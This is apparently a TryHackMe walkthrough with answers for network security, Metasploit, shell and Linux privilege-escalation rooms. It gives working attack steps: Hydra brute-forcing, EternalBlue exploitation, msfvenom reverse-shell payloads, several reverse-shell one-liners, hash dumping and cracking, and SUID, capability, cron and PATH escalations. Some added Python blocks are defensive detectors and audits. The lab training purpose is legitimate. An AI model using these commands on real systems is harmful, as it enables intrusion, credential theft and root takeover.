What do you need to add to the command sudo tcpdump to capture only Telnet traffic?

port 23

What is the simplest display filter you can use with Wireshark to show only IMAP traffic?

imap

Man-in-the-Middle (MITM) Attack

How many different interfaces does Ettercap offer?

3

In how many ways can you invoke Bettercap?

3

Transport Layer Security (TLS)

DNS can also be secured using TLS. What is the three-letter acronym of the DNS protocol that uses TLS?

DoT

Secure Shell (SSH)

Use SSH to connect to 10.10.133.108 as mark with the password XBtc49AB. Using uname -r, find the kernel release.

5.4.0-84-generic

Use SSH to download the file book.txt from the remote system. How many KBs did scp display as download size?

415

Password Attack

We learned that one of the email accounts is lazie. What is the password used to access the IMAP service on IP?

butterfly

Net Sec Challenge

Challenge Questions

What is the highest port number being open less than 10,000?

sudo nmap -sT -p1-10000 -Pn IP (scan ports 1 to 10000 only)

8080

There is an open port outside the common 1000 ports; it is above 10,000. What is it?

sudo nmap -sT -p1-65535 -Pn IP (widen the port range to all 65535 ports)

10021

How many TCP ports are open?

6

What is the flag hidden in the HTTP server header?

Send a Telnet GET request to / on port 80 of the server.

THM{web_server_25352}

What is the flag hidden in the SSH server header?

Send a Telnet connection request to port 22 of the server.

THM{946219583339}

We have an FTP server listening on a nonstandard port. What is the version of the FTP server?

Send a Telnet connection request to port 10021 of the server.

vsFTPd 3.0.3

We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?

The userlist.txt file contains the usernames found through social engineering, eddie and quinn.

hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt 10.10.8.62 -s 10021 ftp

[Screenshot: Hydra output]

Log in to the FTP server on port 10021 with the passwords Hydra found. The flag is in quinn’s directory; you can download it using the get <filename> command.

THM{321452667098}

Browsing to http://IP:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?

nmap -f -sN IP [Fragmented packets and a TCP Null scan]

THM{f7443f99}

Vulnerability Research


Vulnerabilities 101

An attacker has been able to upgrade the permissions of their system account from “user” to “administrator”. What type of vulnerability is this?

operating system

You manage to bypass a login panel using cookies to authenticate. What type of vulnerability is this?

application logic

Scoring Vulnerabilities (CVSS & VPR)

What year was the first iteration of CVSS published?

2005

If you wanted to assess vulnerability based on the risk it poses to an organisation, what framework would you use?

VPR

If you wanted to use a framework that was free and open-source, what framework would that be?

CVSS

Vulnerability Databases

Using NVD, how many CVEs were submitted in July 2021?

1585

Who is the author of Exploit-DB?

Offensive Security

An Example of Finding a Vulnerability

What type of vulnerability did we use to find the name and version of the application in this example?

version disclosure

Showcase: Exploiting Ackme’s Application

Follow along with the showcase of exploiting ACKme’s application to the end to retrieve a flag. What is this flag?

THM{ACKME_ENGAGEMENT}

Exploit Vulnerabilities

Automated Vs. Manual Vulnerability Research

You are working close to a deadline for your penetration test and need to scan a web application quickly. Would you use an automated scanner? (Yay/Nay)

yay

You are testing a web application and find that you are able to input and retrieve data in a database. What vulnerability is this?

injection

You manage to impersonate another user. What vulnerability is this?

broken access control

Finding Manual Exploits

What website would you use as a security researcher if you wanted to upload a Proof of Concept?

github

You are performing a penetration test at a site with no internet connection. What tool could you use to find exploits to use?

searchsploit

Example of Manual Exploitation

What type of vulnerability was used in this attack?

remote code execution

Practical: Manual Exploitation

Find out the version of the application that is running. What are the name and version number of the application?

online book store v1.0

Now use the resources and skills from this module to find an exploit that will allow you to gain remote access to the vulnerable machine.

You can find the exploit at -
https://www.exploit-db.com/exploits/47887
Download the exploit and save it as 47887.py.
Run the exploit using
python3 47887.py http://IP

Use this exploit against the vulnerable machine. What is the value of the flag located in a web directory?

[Screenshot: Online Bookstore exploit]

THM{BOOK_KEEPING}

Vulnerability Capstone

Exploit the Machine (Flag Submission)

What is the name of the application running on the vulnerable machine?

fuel cms

What is the version number of this application?

1.4

What is the number of the CVE that allows an attacker to remotely execute code on this application?

CVE-2018-16763

What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.

The exploit for Fuel CMS 1.4.1 for RCE can be found here -

https://gist.githubusercontent.com/kriss-u/8e1b44b1f4e393cf0d8a69117227dbd2/raw/4419f8dc7090a41c7ebc96048daf67c43c1996a3/exploit.py

Open a netcat listener on the Attack Box.

[Screenshot: Capstone 1]

As mentioned at https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, we can get a reverse shell back to netcat using this command

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Attack Box IP] [Netcat listener port] >/tmp/f

[Screenshot: Capstone 2]

THM{ACKME_BLOG_HACKED}

Metasploit

Introduction

Main Components of Metasploit

What is the name of the code taking advantage of a flaw on the target system?

Exploit

What is the name of the code that runs on the target system to achieve the attacker’s goal?

Payload

What are self-contained payloads called?

singles

Is “windows/x64/pingback_reverse_tcp” a single or a staged payload?

singles

Msfconsole

How would you search for a module related to Apache?

search apache

Who provided the auxiliary/scanner/ssh/ssh_login module?

Can be found by running the command

info auxiliary/scanner/ssh/ssh_login

todb

Working with modules

How would you set the LPORT value to 6666?

set LPORT 6666

How would you set the global value for RHOSTS to 10.10.19.23?

set RHOSTS 10.10.19.23

What command would you use to clear a set payload?

unset payload

What command do you use to proceed with the exploitation phase?

exploit

Metasploit: Exploitation

Scanning

How many ports are open on the target system?

Do the following steps in msfconsole

use auxiliary/scanner/portscan/tcp
set RHOSTS TARGET_IP
exploit
Ans - 5

Using the relevant scanner, what NetBIOS name can you see?

use auxiliary/scanner/netbios/nbname
set RHOSTS TARGET_IP
exploit
Ans - ACME IT SUPPORT

[Screenshot: Metasploit]

What is running on port 8000?

webfs/1.21

What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.

use auxiliary/scanner/smb/smb_login
set RHOSTS Target_IP
set SMBUser penny
set PASS_FILE /usr/share/wordlists/metasploit/MetasploitWordlist.txt
exploit
Ans - leo1234

Vulnerability Scanning

Who wrote the module that allows us to check SMTP servers for the open relay?

Campbell Murray

Exploitation

Exploit one of the critical vulnerabilities on the target VM

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS TARGET_IP
set LHOST Internal_IP
exploit

What is the content of the flag.txt file?

In meterpreter

search -f flag.txt
# change to the directory the search reported, C:\Users\Jon\Documents
cd C:\\Users\\Jon\\Documents
cat flag.txt
Ans - THM-5455554845

What is the NTLM hash of the password of the user “pirate”?

In meterpreter

hashdump
pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::
Ans - 8ce9a3ebd1647fcc5e04025019f4b875

Msfvenom

Steps -

# On the Attack Box 
sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.6.29.56 LPORT=4444 -f elf > rev_shell.elf
# Run a Python Server to serve the created payload to the victim
python3 -m http.server 9000
# Open msfconsole to use the multi/handler
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 10.6.29.56
set LPORT 4444
run

# You will get a meterpreter session after giving the .elf file execute
# permission and running it on the target.
# In the meterpreter session --
run post/linux/gather/hashdump
claire:$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0:1002:1002::/home/claire:/bin/sh
Ans - $6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0

Metasploit: Meterpreter

Post-Exploitation Challenge

Steps in msfconsole

use exploit/windows/smb/psexec
set RHOSTS TARGET_IP
set LHOST INTERNAL_IP
set SMBUser ballen
set SMBPass Password1
exploit

What is the computer name?

sysinfo
Ans - ACME-TEST

What is the target domain?

Also shown in the sysinfo output

Ans - FLASH 

What is the name of the share likely created by the user?

run post/windows/gather/enum_shares
Ans - speedster

What is the NTLM hash of the jchambers user?

# We need to migrate into the lsass.exe process first:
# check our own PID, then list processes to find the PID of lsass.exe
getpid
ps
migrate 764   # PID of lsass.exe in this session
hashdump
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
Ans - 69596c7aa1e8daee17f8e78870e25a5c
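
Two hash listing formats appear in these notes: the pwdump-style lines that hashdump prints on Windows (user:RID:LM:NT:::) and the passwd-style lines with the hash in the second field that post/linux/gather/hashdump produces. The following Python is an added example, not part of the original write-up or of Metasploit: it parses both layouts, identifies the crypt(3) algorithm from the hash prefix, and flags the well-known empty-string LM and NT hashes so an analyst reading such output can tell "LM disabled" from "blank password". The two sample lines are the ones shown above on this page; the function and field names are assumptions made for the example.

```python
import re

# Sample lines copied from the hashdump outputs shown earlier on this page.
PWDUMP_LINE = "pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::"
UNSHADOWED_LINE = (
    "claire:$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0"
    ":1002:1002::/home/claire:/bin/sh"
)

# LM hash of the empty string: Windows stores this when LM hashing is disabled.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty string: an account whose NT field equals this has a blank password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# crypt(3) identifiers found between the first two '$' of a Unix password hash.
CRYPT_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
             "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}


def parse_pwdump_line(line):
    """Parse a pwdump-format line: user:RID:LM hash:NT hash:::"""
    fields = line.rstrip().split(":")
    if len(fields) < 4:
        raise ValueError("not a pwdump line: %r" % line)
    user, rid, lm, nt = fields[:4]
    lm, nt = lm.lower(), nt.lower()
    return {
        "user": user,
        "rid": int(rid),
        "lm": lm,
        "nt": nt,
        "lm_disabled": lm == EMPTY_LM,     # LM field holds the empty-string hash
        "blank_password": nt == EMPTY_NT,  # NT field holds the empty-string hash
    }


def parse_unshadowed_line(line):
    """Parse a passwd-style line whose second field is the password hash
    (the layout post/linux/gather/hashdump and `unshadow` produce)."""
    fields = line.rstrip().split(":")
    if len(fields) < 7:
        raise ValueError("expected at least 7 colon-separated fields: %r" % line)
    user, pw_hash, uid, gid, gecos, home, shell = fields[:7]
    m = re.match(r"^\$([^$]+)\$", pw_hash)
    if m:
        algo = CRYPT_IDS.get(m.group(1), "unknown ($%s$)" % m.group(1))
    elif pw_hash == "" or pw_hash.startswith(("!", "*")):
        algo = "locked-or-no-password"
    else:
        algo = "descrypt-or-unknown"     # 13-char traditional DES crypt or something else
    return {"user": user, "hash": pw_hash, "algorithm": algo, "uid": int(uid),
            "gid": int(gid), "gecos": gecos, "home": home, "shell": shell}


if __name__ == "__main__":
    print(parse_pwdump_line(PWDUMP_LINE))
    print(parse_unshadowed_line(UNSHADOWED_LINE))
```

The algorithm name is what tells a defender how expensive cracking would be (sha512crypt and yescrypt are salted and iterated; an NT hash is a single unsalted MD4), which is why a password audit should report it alongside the account.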

What is the cleartext password of the jchambers user?

Put the NTLM hash on Crackstation.net

Trustno1

Where is the “secrets.txt” file located?

search -f secrets.txt
Ans - c:\Program Files (x86)\Windows Multimedia Platform

What is the Twitter password revealed in the “secrets.txt” file?

KDSvbsw3849

Where is the “realsecret.txt” file located?

search -f realsecret.txt
c:\inetpub\wwwroot

What is the real secret?

The Flash is the fastest man alive

Privilege Escalation


What the Shell?

Types of Shell

Which type of shell connects back to a listening port on your computer, Reverse (R) or Bind (B)?

R

You have injected malicious shell code into a website. Is the shell you receive likely to be interactive? (Y or N)

N

When using a bind shell, would you execute a listener on the Attacker (A) or the Target (T)?

T

Netcat

Which option tells netcat to listen?

-l

How would you connect to a bind shell on the IP address: 10.10.10.11 with port 8080?

nc 10.10.10.11 8080

Netcat Shell Stabilisation

Technique 1:

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg
reset # To restart shell echo

Technique 2:

sudo apt install rlwrap # On Attacker
rlwrap nc -lvnp <port>
stty raw -echo; fg

Technique 3: Socat

How would you change your terminal size to have 238 columns?

stty cols 238

What is the syntax for setting up a Python3 webserver on port 80?

sudo python3 -m http.server 80

Socat

How would we get socat to listen on TCP port 8080?

TCP -L:8080

Socat Encrypted Shells

What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called “encrypt.pem”

socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0

If your IP is 10.10.10.5, what syntax would you use to connect back to this listener?

socat OPENSSL:10.10.10.5:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

Common Shell Payloads

mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

The command first creates a named pipe at /tmp/f. It then starts a netcat listener, and connects the input of the listener to the output of the named pipe. The output of the netcat listener (i.e. the commands we send) then gets piped directly into sh, sending the stderr output stream into stdout, and sending stdout itself into the input of the named pipe, thus completing the circle
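
From the defender's side, these same shapes are what a command-line or auditd monitor looks for. The following Python is an added example, not part of the original notes or of TryHackMe material: it runs a few regular-expression rules for the shell payload forms discussed on this page (a fifo piped through netcat, bash's /dev/tcp redirection, nc -e, and socat EXEC) over constructed sample command lines. The sample lines, rule names and function names are assumptions made for the example.

```python
import re

# Constructed sample command lines, e.g. as recorded by auditd EXECVE events or a
# shell-history export. They are illustrative, not captured from a real host.
SAMPLE_COMMANDS = [
    "ls -la /var/www/html",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 4444 >/tmp/f",
    "bash -i >& /dev/tcp/10.0.0.5/6666 0>&1",
    "nc 10.0.0.5 443 -e /bin/bash",
    'socat OPENSSL:10.0.0.5:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane',
    "tar czf backup.tgz /home/karen",
    "nc -zv mail.example.org 25",
]

# Each rule is (name, regex over the whole command line). The rules mirror the
# payload shapes on this page; a real ruleset would also cover python/perl shells.
RULES = [
    ("fifo_with_netcat", re.compile(r"\bmkfifo\s+\S+.*\b(nc|ncat|netcat)\b")),
    ("bash_dev_tcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d{1,5}")),
    ("netcat_exec_shell",
     re.compile(r"\b(nc|ncat|netcat)\b.*\s-[a-zA-Z]*[ec]\s+\S*(ba|z|da)?sh\b")),
    ("socat_exec_shell", re.compile(r"\bsocat\b.*\bEXEC:[\"']?\S*?(ba|z|da)?sh\b")),
]


def classify_command(cmd):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def scan_commands(lines):
    """Return [(line, [rule names])] for the lines that hit at least one rule."""
    hits = []
    for line in lines:
        names = classify_command(line)
        if names:
            hits.append((line, names))
    return hits


if __name__ == "__main__":
    for line, names in scan_commands(SAMPLE_COMMANDS):
        print(", ".join(names), "<-", line)
```

The port scan and the tar backup fall through untouched: the rules key on a network tool being wired to a shell, not on netcat or a remote IP alone, which keeps the alert volume manageable on hosts where administrators legitimately use nc.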

What command can be used to create a named pipe in Linux?

mkfifo

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md

msfvenom

Which symbol is used to show that a shell is stageless?

_

What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell

msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell.elf LHOST=10.10.10.5 LPORT=443

Metasploit multi/handler

What command can be used to start a listener in the background?

exploit -j

If we had just received our tenth reverse shell in the current Metasploit session, what would be the command used to foreground it?

sessions 10

Practice and Examples

Try uploading a webshell to the Linux box, then use the command: nc <LOCAL-IP> <PORT> -e /bin/bash to send a reverse shell back to a waiting listener on your own machine.

Ans -

  1. Go to /usr/share/webshells/php and copy php-reverse-shell.php to your home directory.
  2. Update php-reverse-shell.php with your TryHackMe internal IP address and a port of your choice.
  3. Open a netcat listener on the port set in the script:
     nc -lnvp <PORT>
  4. Browse to the Linux server's IP address in Firefox, upload the updated PHP reverse shell file, and click on the file after submitting it.

[Screenshot: Practice and Examples]

Privilege Escalation

Enumeration

What is the hostname of the target system?

wade7363

What is the Linux kernel version of the target system?

3.13.0-24-generic

What Linux is this?

Ubuntu 14.04 LTS

What version of the Python language is installed on the system?

2.7.6

What vulnerability seems to affect the kernel of the target system? (Enter a CVE number)

CVE-2015-1328

Privilege Escalation: Kernel Exploits

Once the Linux machine is up, run

uname -a

This shows the Linux kernel version, 3.13.0-24-generic. A Google search turns up the exploit at https://www.exploit-db.com/exploits/37292. Download the exploit's C file to your attack box and compile it, then start a Python HTTP server to serve the binary to the target Ubuntu machine.

gcc 37292.c -o ofs
python -m http.server 8000

The user karen does not have permission to write to her home directory, so run wget in /tmp instead. Then give the binary execute permission and run it.

cd /tmp
wget http://ATTACKBOXIP:8000/ofs
chmod +x ofs
./ofs

Once we get root the flag1.txt file is in

cat /home/matt/flag1.txt
THM-28392872729920

Privilege Escalation: Sudo

How many programs can the user “karen” run on the target system with sudo rights?

Run the sudo -l command

3

What is the content of the flag2.txt file?

sudo find / -name flag2.txt
less /home/ubuntu/flag2.txt
THM-402028394

How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

You can find the details on gtfobins https://gtfobins.github.io/gtfobins/nmap/

sudo nmap --interactive

What is the hash of frank’s password?

sudo less /etc/shadow
$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1
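
The sudo -l output is also what an administrator should review before a pentester does. The following Python is an added example, not from the original notes or from the sudo project: it parses the rule section of sudo -l output and flags rules that let a user run, as root, a binary which GTFOBins documents as able to spawn a shell or read arbitrary files (the page's own nmap, find, less, base64 and vim among them). The sudo -l text is constructed for the example, and the allowlist of shell-capable binaries is illustrative rather than complete.

```python
import re

# Constructed `sudo -l` output for a low-privileged user; not the room's real output.
SUDO_L_OUTPUT = """\
Matching Defaults entries for karen on ip-10-10-1-2:
    env_reset, mail_badpass

User karen may run the following commands on ip-10-10-1-2:
    (ALL) NOPASSWD: /usr/bin/find
    (ALL) NOPASSWD: /usr/bin/less
    (root) /usr/bin/apt-get update
"""

# One sudo rule line: "(runas[:rungroup]) [TAG: ...] command [args]"
RULE_RX = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")

# Binaries that can break out to a shell or read any file when run with sudo
# (illustrative subset drawn from the tools mentioned on this page).
SHELL_CAPABLE = {"find", "less", "nmap", "vim", "vi", "base64", "nano", "python3", "bash"}


def parse_sudo_l(text):
    """Return one dict per rule line after the 'may run the following commands' header."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RX.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()   # drop an optional run-as group
        cmd = m.group("cmd")
        binary = cmd.split()[0].rsplit("/", 1)[-1]       # basename of the allowed program
        rules.append({
            "runas": runas,
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "command": cmd,
            "binary": binary,
        })
    return rules


def risky_sudo_rules(rules):
    """Rules that run a shell-capable binary as root (or ALL), regardless of NOPASSWD."""
    return [r for r in rules if r["runas"] in ("ALL", "root") and r["binary"] in SHELL_CAPABLE]


if __name__ == "__main__":
    for r in risky_sudo_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        print("root shell possible via sudo:", r["command"], "(NOPASSWD)" if r["nopasswd"] else "")
```

The check deliberately ignores NOPASSWD when deciding risk: a rule that still prompts for the user's own password is no safer once that password is known, as the cron job section below shows.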

Privilege Escalation: SUID

Which user shares the name of a great comic book writer?

You can find users in /etc/passwd file

gerryconway

What is the password of user2?

When we run find / -type f -perm -04000 -ls 2>/dev/null on the Ubuntu machine we can see that base64 has the SUID bit set, and GTFOBins shows how to use it to read files. Read the shadow and passwd files with it, serve them with a Python HTTP server, and fetch them to your attack box to run unshadow on them.

cd /tmp
base64 "/etc/shadow" | base64 --decode > shadow.txt
cat /etc/passwd > passwd.txt
python3 -m http.server 8000

In your attack box

unshadow passwd.txt shadow.txt > passwords.txt
john passwords.txt

[Screenshot: Privilege Escalation: SUID]

Password1

What is the content of the flag3.txt file?

base64 "/home/ubuntu/flag3.txt" | base64 --decode
THM-3847834

Privilege Escalation: Capabilities

Run getcap -r / 2>/dev/null on the victim machine.

Vim has the cap_setuid capability set.

How many binaries have set capabilities?

6

What other binary can be used through its capabilities?

view

What is the content of the flag4.txt file?

Use the command listed below to get root with Capabilities. Then read the file in /home/ubuntu/flag4.txt. I was getting errors with the command in GTFObins so I updated it from :py to :python3.

vim -c ':python3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' 
THM-9349843
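
Both the SUID section and the capabilities section come down to the same audit: list the files that can change identity, and compare them with what a stock install is expected to have. The following Python is an added example, not from the original notes or from the GTFOBins project: it parses constructed excerpts of find -ls and getcap -r output, reports setuid binaries missing from an allowlist (here base64), and reports binaries holding capabilities such as cap_setuid (here vim and view). The listings, the allowlist contents and the function names are assumptions made for the example.

```python
import re

# Constructed excerpt of `find / -type f -perm -04000 -ls 2>/dev/null` output.
FIND_LS_OUTPUT = """\
   262   44 -rwsr-xr-x   1 root     root        44784 Jan 19  2021 /usr/bin/passwd
   263   68 -rwsr-xr-x   1 root     root        67816 Jan 19  2021 /usr/bin/su
   264   40 -rwsr-xr-x   1 root     root        39144 Mar  6  2020 /usr/bin/base64
   265  164 -rwsr-xr-x   1 root     root       166056 Jan 19  2021 /usr/bin/sudo
"""

# Constructed excerpt of `getcap -r / 2>/dev/null` output (older "path = caps" layout).
GETCAP_OUTPUT = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/home/ubuntu/view = cap_setuid+ep
/usr/bin/vim = cap_setuid+ep
"""

# Illustrative allowlist of SUID binaries a stock Ubuntu install is expected to carry.
EXPECTED_SUID = {"/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/chfn",
                 "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
                 "/usr/bin/umount"}

# Capabilities that let a program change identity or bypass file permission checks.
DANGEROUS_CAPS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
                  "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module"}


def parse_find_ls(text):
    """Parse `find -ls` lines into (path, mode string, owner) tuples."""
    entries = []
    for line in text.splitlines():
        parts = line.split(None, 10)          # 11 columns; the path may contain spaces
        if len(parts) < 11:
            continue
        entries.append((parts[10], parts[2], parts[4]))
    return entries


def unexpected_suid(entries, expected):
    """Paths with the setuid bit (4th mode character 's' or 'S') not on the allowlist."""
    return [path for path, mode, _ in entries if mode[3] in "sS" and path not in expected]


def parse_getcap(text):
    """Parse getcap output into (path, set of capability names).
    Handles both 'path = cap+ep' (older libcap) and 'path cap=ep' (newer libcap)."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if " = " in line:
            path, caps = line.split(" = ", 1)
        else:
            path, caps = line.rsplit(None, 1)
        names = {c.strip() for c in re.split(r"[+=]", caps)[0].split(",")}
        entries.append((path, names))
    return entries


def risky_capabilities(entries):
    """(path, dangerous capabilities held) for every binary holding at least one."""
    return [(path, caps & DANGEROUS_CAPS) for path, caps in entries if caps & DANGEROUS_CAPS]


if __name__ == "__main__":
    print("unexpected SUID:", unexpected_suid(parse_find_ls(FIND_LS_OUTPUT), EXPECTED_SUID))
    print("risky capabilities:", risky_capabilities(parse_getcap(GETCAP_OUTPUT)))
```

Run on a real host, the allowlist should come from a clean reference image of the same distribution release rather than from a hand-typed set, so that a drifted package or a deliberately planted binary shows up as a difference.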

Privilege Escalation: Cron Jobs

How many user-defined cron jobs can you see on the target system?

cat /etc/crontab
4

What is the content of the flag5.txt file?

Give the backup.sh file execute permission and edit it.

chmod +x /home/karen/backup.sh
vi /home/karen/backup.sh

Inside the file

#!/bin/bash

bash -i >& /dev/tcp/AttackBoxIP/6666 0>&1

On the attack box

nc -nlvp 6666

# Once you get root reverse shell
cat /home/ubuntu/flag5.txt

What is Matt’s password?

You can copy the /etc/shadow and /etc/passwd files to your attack box, unshadow them, and run John the Ripper on the result to find the password.

unshadow passwd.txt shadow.txt > passwords.txt
john passwords.txt
123456 # Matt's Password
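
The weakness in this section is a root cron job that runs a script another user can write to, or that points at a path that no longer exists in a world-writable directory. The following Python is an added example, not from the original notes or from cron itself: it parses a constructed /etc/crontab, keeps the jobs that run as root, and reports the ones whose command is a bare name resolved through cron's PATH, a script owned or writable by a non-root user, or a missing script in a directory others can write to. The crontab text, the file and directory metadata, and the function names are assumptions made for the example.

```python
import re

# Constructed /etc/crontab; the jobs echo the ones described in the section above.
CRONTAB = """\
SHELL=/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
* * * * *  root /antivirus.sh
* * * * *  root antivirus.sh
* * * * *  root /home/karen/backup.sh
* * * * *  root /tmp/test.py
0 2 * * *  karen /home/karen/cleanup.sh
"""

# Constructed metadata standing in for os.stat(): path -> (owner, mode bits).
FILES = {
    "/home/karen/backup.sh": ("karen", 0o755),
    "/home/karen/cleanup.sh": ("karen", 0o755),
}
DIRS = {
    "/": ("root", 0o755),
    "/home/karen": ("karen", 0o755),
    "/tmp": ("root", 0o1777),   # sticky, world-writable
}


def parse_crontab(text):
    """Return [{'schedule', 'user', 'command'}] for every job line in a system crontab."""
    jobs = []
    for raw in text.splitlines():
        s = raw.strip()
        if not s or s.startswith("#") or re.match(r"^[A-Za-z_]+=", s):
            continue                         # blank, comment or VAR=value line
        if s.startswith("@"):                # @reboot / @daily style schedule
            parts = s.split(None, 2)
            if len(parts) < 3:
                continue
            schedule, user, command = parts
        else:
            parts = s.split(None, 6)         # five time fields, user, then the command
            if len(parts) < 7:
                continue
            schedule, user, command = " ".join(parts[:5]), parts[5], parts[6]
        jobs.append({"schedule": schedule, "user": user, "command": command})
    return jobs


def audit_cron_jobs(jobs, files, dirs):
    """Map each root-run command to the reason it is a privilege escalation risk."""
    findings = {}
    for job in jobs:
        if job["user"] != "root":
            continue                          # only root-run jobs elevate privilege
        prog = job["command"].split()[0]
        if not prog.startswith("/"):
            findings[job["command"]] = "relative command name resolved through cron's PATH"
            continue
        parent = prog.rsplit("/", 1)[0] or "/"
        meta = files.get(prog)
        if meta is None:
            d_owner, d_mode = dirs[parent]
            if d_owner != "root" or d_mode & 0o002:
                findings[job["command"]] = "script missing from a directory non-root users can write to"
            else:
                findings[job["command"]] = "script missing (stale job)"
            continue
        owner, mode = meta
        if owner != "root" or mode & 0o022:
            findings[job["command"]] = "script owned or writable by a non-root user"
    return findings


if __name__ == "__main__":
    for command, reason in audit_cron_jobs(parse_crontab(CRONTAB), FILES, DIRS).items():
        print("%-28s %s" % (command, reason))
```

On a live system the two dicts would be replaced by os.stat() calls; the logic stays the same, and the fix for every finding is the same too: root-run scripts live in root-owned directories, are owned by root, and are not group- or world-writable.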

Privilege Escalation: PATH

What is the odd folder you have write access for?

find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
/home/murdoch

We add /home/murdoch to the PATH and create a thm binary that opens a shell.

export PATH=/home/murdoch:$PATH
echo "/bin/bash" > thm
chmod 777 thm

The ./test executable calls thm by name, so just run it and you will get a root shell.

What is the content of the flag6.txt file?

cat /home/matt/flag6.txt
THM-736628929
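
The mechanism here is ordinary PATH resolution: a bare command name is looked up directory by directory, and the first hit wins, so any PATH directory the current user can write to lets that user decide what a privileged program runs. The following Python is an added example, not from the original notes: it models that lookup over a constructed table of directories (owner, mode, executables present), lists the PATH entries a given user could plant a file in, and shows which file a bare name resolves to before and after the directory from this section is prepended. The table and function names are assumptions made for the example.

```python
# Constructed view of a few directories: owner, mode bits and the executables inside.
# Stands in for os.stat() and os.listdir(); not a real filesystem listing.
DIRS = {
    "/usr/local/bin": ("root", 0o755, set()),
    "/usr/bin": ("root", 0o755, {"ls", "cat", "test"}),
    "/bin": ("root", 0o755, {"sh", "bash"}),
    "/home/murdoch": ("murdoch", 0o755, set()),
    "/tmp": ("root", 0o1777, set()),
}


def writable_dirs_in_path(path_value, dirs, user):
    """PATH directories `user` could place a binary in: owned by the user or world-writable."""
    out = []
    for d in path_value.split(":"):
        if d not in dirs:
            continue                      # non-existent entries cannot be written to (yet)
        owner, mode, _ = dirs[d]
        if owner == user or mode & 0o002:
            out.append(d)
    return out


def resolve(name, path_value, dirs):
    """First PATH directory containing `name`, exactly as a shell resolves a bare command."""
    for d in path_value.split(":"):
        if d in dirs and name in dirs[d][2]:
            return d + "/" + name
    return None


def with_binary(dirs, directory, name):
    """Return a copy of the table with `name` added to `directory` (simulates creating a file)."""
    new = dict(dirs)
    owner, mode, names = new[directory]
    new[directory] = (owner, mode, names | {name})
    return new


if __name__ == "__main__":
    safe = "/usr/local/bin:/usr/bin:/bin"
    hijacked = "/home/murdoch:" + safe
    print("writable on default PATH:", writable_dirs_in_path(safe, DIRS, "murdoch"))
    print("thm resolves to:", resolve("thm", safe, DIRS))
    print("writable on altered PATH:", writable_dirs_in_path(hijacked, DIRS, "murdoch"))
    print("thm resolves to:", resolve("thm", hijacked, with_binary(DIRS, "/home/murdoch", "thm")))
```

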